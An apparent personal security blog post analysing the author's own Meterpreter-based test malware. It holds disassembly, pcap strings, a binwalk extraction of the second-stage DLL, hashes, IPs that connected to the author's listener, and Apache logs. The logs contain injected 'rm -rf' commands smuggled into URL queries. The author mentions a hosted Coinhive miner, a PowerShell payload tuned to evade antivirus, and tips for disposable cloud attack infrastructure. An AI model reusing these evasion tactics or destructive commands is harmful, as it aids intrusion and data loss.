||||| 0x000000e7 22b2c348b823 and dh, byte [edx + 0x23b848c3]

||||| 0x000000ed 0b47c4 or eax, dword [edi - 0x3c]

||||| 0x000000f0 638764382d60 arpl word [edi + 0x602d3864], ax

||||| 0x000000f6 002a add byte [edx], ch

||||| 0x000000f8 d9805f104f9e fld dword [eax - 0x61b0efa1]

,====< 0x000000fe 753f jne 0x13f

; because lazy and time

https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data

(myserver):9008 -> exe came across

dumped entire pcap from c2 into file:

- file resumepcap.hexdump

-- resumepcap.hexdump: data

egrep -nor '[^ ]{30,}' resumepcap.stringsdump |grep string

1237:string=core_negotiate_tlv_encryption

1238:string=core_transport_set_timeouts

1239:string=core_transport_getcerthash

1240:string=core_transport_setcerthash

1261:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r

1382:string=InitializeCriticalSectionEx

1385:string=SetThreadStackGuarantee

1388:string=WaitForThreadpoolTimerCallbacks

1393:string=FlushProcessWriteBuffers

1394:string=FreeLibraryWhenCallbackReturns

1395:string=GetCurrentProcessorNumber

1396:string=GetLogicalProcessorInformation

1398:string=SetDefaultDllDirectories

1404:string=GetUserDefaultLocaleName

1409:string=GetFileInformationByHandleExW

1410:string=SetFileInformationByHandleW

1436:string=GetUserObjectInformationW

1437:string=GetProcessWindowStation

1770:string=QQ𥸸𥽼𦃀ᙏὫ峹巋O3ï澢漣瀻瀎潌滺殭歩樭栺损槎摲撋搹敷掊搔措揉敆檇憺抪戡拔曇晬暧晜暄栎枵枍曧杘朏晋昪欗棭榨梽硒砩礓禔穑𦅭𦅲𦠑𦆆𦆗𦆦𦆴𦇃𦇛𦇯𦈅𦈠𦈰𦈿𦉒𦉲𦊄𦊖𦊥𦋃𦋔𦋥𦋵𦌌𦌙𦌦𦍁𦍡𦍳𦎋𦎩𦎺𦏈𦏢𦏺𦐍𦐤𦐳𦑈𦑙𦑮𦒂𦒛𦒹𦓎𦓟𦓵𦔉𦔞𦔳𦕆𦕜𦕰𦖇𦖢𦖲𦗒𦗠𦗴𦘋𦘚𦘪𦘹𦙔𦙨𦙾𦚘𦚳𦛌𦛨𦜂𦜟𦜯𦝍𦝮𦝾𦞝𦞶𦟈𦟝𦟷𠁐

1773:string=packet_get_tlv_value_string

1774:string=packet_get_tlv_value_uint

1775:string=packet_get_tlv_value_wstring

1777:string=packet_is_tlv_null_terminated

1778:string=packet_remove_completion_handler

1780:string=packet_transmit_empty_response

1781:string=packet_transmit_response

1784:string=scheduler_insert_waitable

1785:string=scheduler_signal_waitable

1786:string=_scheduler_waitable_thread@4

1789:string=CertGetCertificateContextProperty

1813:string=WinHttpGetIEProxyConfigForCurrentUser

1826:string=SetUnhandledExceptionFilter

1856:string=GetProcessWindowStation

1857:string=GetUserObjectInformationW

1862:string=AllocateAndInitializeSid

1864:string=InitializeSecurityDescriptor

1865:string=SetSecurityDescriptorDacl

1866:string=SetSecurityDescriptorSacl

1873:string=CryptImportPublicKeyInfo

1895:string=CreateToolhelp32Snapshot

1903:string=GetSystemTimeAsFileTime

1908:string=IsProcessorFeaturePresent

1922:string=QueryPerformanceCounter

1924:string=FreeEnvironmentStringsW

1925:string=UnhandledExceptionFilter

1926:string=InitializeCriticalSectionAndSpinCount

1946:string=ImpersonateLoggedOnUser

2008:string=core_pivot_session_died

2028:string=\a\a\b\b\t\t\n\n\v\v\f\f\r\r

2056:string=\t\a\f\b\f\t\f\n\a\v\b\f

2061:string=abcdefghijklmnopqrstuvwxyz

2062:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ

2064:string=abcdefghijklmnopqrstuvwxyz

2065:string=ABCDEFGHIJKLMNOPQRSTUVWXYZ

2147:string=6#6'6+6/63676;6/8N8m8r8

2183:string=3\a43494=4B4H4L4R4V4\4`4e4k4o4u4y4

2186:string=:\b:$:0:6:A:O:X:b:r:w:|:

2212:string=2$2*22272=2E2J2P2X2]2c2k2p2v2~2

2248:string=6<:@:D:H:L:P:T:X:\:`:d:h:

2255:string=:$:,:4:<:D:L:T:\:d:l:t:|:

2256:string=;$;,;4;<;D;L;T;\;d;l;t;|;

2257:string=<$<,<4<<<D<L<T<\<d<l<t<|<

2258:string==$=,=4=<=D=L=T=\=d=l=t=|=

2259:string=>$>,>4><>D>L>T>\>d>l>t>|>

2260:string=?$?,?4?<?D?L?T?\?d?l?t?|?

2261:string=0$0,040<0D0L0T0\0d0l0t0|0

; Got new binary / 2nd stage

binwalk -e resumepcap.hexdump

file _resumepcap.hexdump.extracted/4

_resumepcap.hexdump.extracted/4: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

md5sum _resumepcap.hexdump.extracted/4

eeb70c0bd145011062f0116738e10a5e _resumepcap.hexdump.extracted/4

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md5: eeb70c0bd145011062f0116738e10a5e

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16: 4df2

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32: c854733c

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d md4: db31d79e9eaddfc0a93e043d058c9ca0

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xor: ae

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xorpair: 54fa

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d parity: 01

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d entropy: 07000000

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d hamdist: 06

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d pcprint: 22

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d mod255: f6

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d xxhash: ae3757fa

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d adler32: 52af2f02

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d luhn: 03

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc8smbus: ef

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc15can: 759f

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16hdlc: 270e

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16usb: 2328

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc16citt: 8672

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc24: bd3f25

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32c: 2fa98f85

_resumepcap.hexdump.extracted/4: 0x00000000-0x0007897d crc32ecma267: c7e20603

; lazy again:

cp _resumepcap.hexdump.extracted/4 ./4.exe

https://www.virustotal.com/#/file/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f/detection

https://www.hybrid-analysis.com/sample/5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f?environmentId=120

; Total IOCs

(myserver):9008

9A8FE886ABA12E02FD0FC44F004A7111

rahash2 -a all _resumepcap.hexdump.extracted/4 |awk '{print $3,$4}'

md5: eeb70c0bd145011062f0116738e10a5e

sha1: 295be71de968e22a14c2a0fb558d3295b4c2a7c3

sha256: 5baecac3ee5cf8f8f0d13d19c540310681abbc1e6978e397d077885d6c104b6f

sha384: 950bee417b6b6fa9bbdb4becbcba3b574a4d8d4201d6a089bd8bf4a566291d976f803331999cd46ed2c53c49bdeda973

sha512: aa15fb09b5e8a5b9904ef3582f28a521afc32a1f3771dec65e5699b08bcad2fbccfb43c1124987cc1d78ba8814a98c75f28ff73a82f7c125c5515f389c7d9cff

crc16: 4df2

crc32: c854733c

md4: db31d79e9eaddfc0a93e043d058c9ca0

xor: ae

xorpair: 54fa

parity: 01

entropy: 07000000

hamdist: 06

pcprint: 22

mod255: f6

xxhash: ae3757fa

adler32: 52af2f02

luhn: 03

crc8smbus: ef

crc15can: 759f

crc16hdlc: 270e

crc16usb: 2328

crc16citt: 8672

crc24: bd3f25

crc32c: 2fa98f85

crc32ecma267: c7e20603

rahash2 -a all resume1.doc.exe |awk '{print $3,$4}'

md5: 90f7ee1bf4451349dfa7c518a8c6202a

sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82

sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6

sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad

sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691

crc16: 9f78

crc32: 1b63e4bd

md4: 282dcd274bd2efade3765ddff3ec65e1

xor: eb

xorpair: 3ad1

parity: 00

entropy: 03000000

hamdist: 01

pcprint: 2d

mod255: 4d

xxhash: 5924b386

adler32: 913ba49c

luhn: 00

crc8smbus: 3f

crc15can: 5a1d

crc16hdlc: 4045

crc16usb: a732

crc16citt: 4b6a

crc24: 7a1917

crc32c: d18b15a4

crc32ecma267: df97a7b0

rahash2 -a all resumebase64.decoded |awk '{print $3,$4}'

md5: 3205f33d70ec93109d60da5fe1002e7e

sha1: ec19a5fa86353b176941809b1e9858aead9047a3

sha256: e02b170466ee0f810656bfeca8c9c7ce523b635fa36248dd7f9259629a593be5

sha384: f232b1f8dd2d2c4d07dc761eb6ef1b7defbc6379f15222d607e43e22a2f0c48ea98986db9e32164e3c88287d34224d73

sha512: 547fb256993e4febce7f3da35ce5cfbf485e8ee97f9fe1861b82172b4c7f94082fa5b66738d289a0db2fb3be97acb900290786bf987f813ef00eb8aee97f1f51

crc16: 78af

crc32: d40234f5

md4: 1a8108290cfc7ffa605b0879d6e3b8f2

xor: 0a

xorpair: 0a00

parity: 00

entropy: 03000000

hamdist: 02

pcprint: 32

mod255: 98

xxhash: c09b7c9b

adler32: be051623

luhn: 09

crc8smbus: 84

crc15can: 4d93

crc16hdlc: e7fa

crc16usb: 8313

crc16citt: f7ba

crc24: e9c836

crc32c: 75c98a63

crc32ecma267: 04a00a8f

The gist of all that, is that it connected back to port 9008 on my server where I have an active meterpreter listener forwarded to. Pretty easy, not really a difficult analysis, really a 5 minute rush job. But, it does help me know that meterpreter launches that secondary payload when ran, that's pretty sweet, though everyone sort of knew that. But since launching this and a few other things online, I've received a number of hits on my shell from people looking at that port:

185.220.101.6
163.172.214.8
37.59.20.111
107.178.194.23
52.200.221.20
14.141.107.206
66.249.88.132
208.87.233.140
185.220.101.13
161.69.99.11
5.62.59.93
1.192.194.17
134.96.238.193
50.112.194.65

As of the time of this writing:

curl "https://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv" 2>/dev/null|grep "185.220.101.6\|163.172.214.8\|37.59.20.111\|107.178.194.23\|52.200.221.20\|50.112.194.65\|14.141.107.206\|66.249.88.132\|208.87.233.140\|185.220.101.13\|161.69.99.11\|5.62.59.93\|1.192.194.17\|134.96.238.193\|50.112.194.65"

163.172.214.8

185.220.101.6

185.220.101.13

This last one is sort of amusing because it tells me they looked a little bit into my site:

/var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"
/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

Edit, I wanted to add more because it amuses me the comparison between ips connecting to my c2 port for my test malware versus the hosts connecting to my web server, not including tor nodes:

grep -i "37.59.20.111\|107.178.194.23\|52.200.221.20\|14.141.107.206\|66.249.88.132\|208.87.233.140\|161.69.99.11\|5.62.59.93\|1.192.194.171\|34.96.238.193\|50.112.194.65" /var/log/apache2/access.log* /var/log/apache2/access.log:50.112.194.65 - - [16/Apr/2018:07:31:29 -0500] "GET /diagfix.cmd HTTP/1.1" 200 7184 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

/var/log/apache2/access.log.8:107.178.194.23 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html?lol&rm%20-rf%20/boot/&rm%20-rf%20/opt/&rm%20-rf%20~/& HTTP/1.1" 200 654 "http://0daz.io" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)"

/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:56 -0600] "GET /miner.html HTTP/1.1" 200 654 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"

/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:26:57 -0600] "GET /coinhive.min.js HTTP/1.1" 200 18805 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13"

/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:29:43 -0600] "GET /miner.html?lol&rm -rf" 400 0 "-" "-"

/var/log/apache2/access.log.8:208.87.233.140 - - [05/Mar/2018:10:32:39 -0600] "GET / HTTP/1.1" 200 8440260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"

/var/log/apache2/access.log.8:52.200.221.20 - - [05/Mar/2018:10:35:21 -0600] "GET / HTTP/1.1" 200 157832 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

/var/log/apache2/access.log.8:50.112.194.65 - - [05/Mar/2018:10:35:32 -0600] "GET / HTTP/1.1" 200 198376 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

These are both things that have been scanned with virus total or other platforms for shits and giggles, but this draws a clear understanding that some do, and some don't use tor with their analysis.

But what are people trying to analyze? Well the miner one, with that particular notion at the end, was one provided in another post on this blog plus my own get data to it. This was specific to a url attempt put into virus total because I want to track who's tracking this. The diagfix is unrelated, but is a repeatedly regenerated (every 300 seconds) unicorn powershell payload. Did this for ease of use and testing the "fud" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. Yara rules could easily determine it, or the exec form. You'll see in my above example I left out the meterpreter yara rules, this is because well, analysis without the answer provided to me.

Things I learned with this week of dickery:

People seem to be rummaging through analyzing things they happen across, or that were involved in something flagged by the apt detection bs.
apparently people detect meterpreter data as part of poison ivy

looked further, neat, the copy of poison ivy I have does partially contain code from meterpreter's stdapi nonsense it sends down.

TheFatRat as a wrapper is pretty nice, but it can be ignored for the power.py and pw_exec.py tools on your own. Such as in a cron/at/while loop.
Automated tools used when analyzing things often show weaker precautions than those meant to provide the reports.
$5 cloud or docker instance, for a few hours of playing with just a minimal amount of preparation before hand, builds a full purposed suite for rapid spin up, attack, and spin down.

Better yet, cloud services providing per hour pay, awww yeah... just don't assume they actually destroy things when it seems they did, go ahead and 0fill everything that you don't want shared before you deprovision.

-Ferasdour
https://keybase.io/ferasdour
https://www.facebook.com/help.ferasdour

Malware, data, and crime

4.16.2018

Party on the malware bus

No comments:

Post a Comment

Intel gathering